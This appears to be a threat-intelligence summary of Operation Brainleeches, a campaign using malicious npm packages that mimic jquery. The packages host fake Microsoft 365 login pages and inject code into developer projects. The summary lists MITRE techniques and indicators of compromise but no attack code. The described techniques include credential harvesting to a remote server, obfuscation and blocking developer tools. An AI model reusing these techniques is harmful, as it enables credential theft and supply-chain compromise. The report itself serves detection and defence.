ReversingLabs’ researchers uncovered more than a dozen malicious npm packages used to power a dual-use campaign that blends phishing against Microsoft 365 users with software supply chain manipulation. Dubbed Operation Brainleeches, the campaign features two distinct package groups and multiple techniques (including obfuscation) to harvest credentials and push malicious code into apps, highlighting the evolving risk of open source dependencies being used for broad attacks. #OperationBrainleeches #IconBurst
Keypoints
- Operation Brainleeches is a two-phase, dual-use campaign leveraging malicious npm packages for both phishing and supply chain manipulation.
- Phase 1 targets end users via phishing attachments that present fake Microsoft login forms and exfiltrate credentials.
- Phase 2 targets developers by injecting malicious code into npm packages that could be bundled into legitimate applications.
- Packages mimic legitimate modules (e.g., jquery) and include obfuscated JavaScript to conceal malicious functionality.
- Two tranches were published between May and June, with around 1,000 downloads before npm removed the packages.
- Evidence suggests turnkey phishing kits and low-skill actors drove the operations, using publicly hosted code and credential harvesting pages.
MITRE Techniques
- [T1195] Supply Chain Compromise – long-term campaigns infiltrate development pipelines and slip malicious code or dependencies into legitimate application updates. “long-term plays in which skilled cyber actors quietly infiltrate development pipelines and slip malicious code or dependencies into legitimate application updates.”
- [T1566.001] Phishing: Spearphishing Attachment – malicious email attachments paired with phishing emails delivering fake Microsoft login flows. “malicious email attachments containing the jquery.js paired with phishing emails.”
- [T1555.003] Credentials in Web Forms – phishing pages capture credentials via a fake Microsoft login form and send them to a remote server. “The DEMO.txt file contains HTML code that mimics the login for Microsoft.com. It also includes the URL of a remote server, hxxp://ourwhite.brainleeches.xyz, to which harvested credentials from the form are sent.”
- [T1027] Obfuscated/Compressed Files and Information – many of the malicious packages contained obfuscated files. “many of these packages contained files that were obfuscated.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – JS within the packages orchestrates the payload (e.g., jquery.js fetching jquery.min.js and writing to a dynamic document). “jquery.js … writing the content of that file to a dynamically created ‘document’.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – attackers disabled right-click and developer tools to hinder discovery. “disable right mouse button functions on the web page and disabling the ability of users to open developer tools with a hot-key.”
- [T1041] Exfiltration Over C2 Channel – credentials exfiltrated to a remote server. “passwords entered into this form were sent to a different location, a server located at the address 137.184.153.238.”
Indicators of Compromise
- [Domain] domain – ourwhite.brainleeches.xyz – used as a command-and-control/resource host for credential harvesting
- [IP Address] 137.184.153.238 – remote server receiving harvested credentials
- [SHA1] 93027a2aa009502ce1992c851d4551573cb90b94 – standforusz 1.0.2
- [SHA1] 121b10560f54d7767d250e15deb4aff89b577d03 – standforusz 1.0.3
- [File name] DEMO.txt – included in standforusz package and used to host/login content
- [File name] index.js – main script inside jqueryoffline package used in the Webpack flow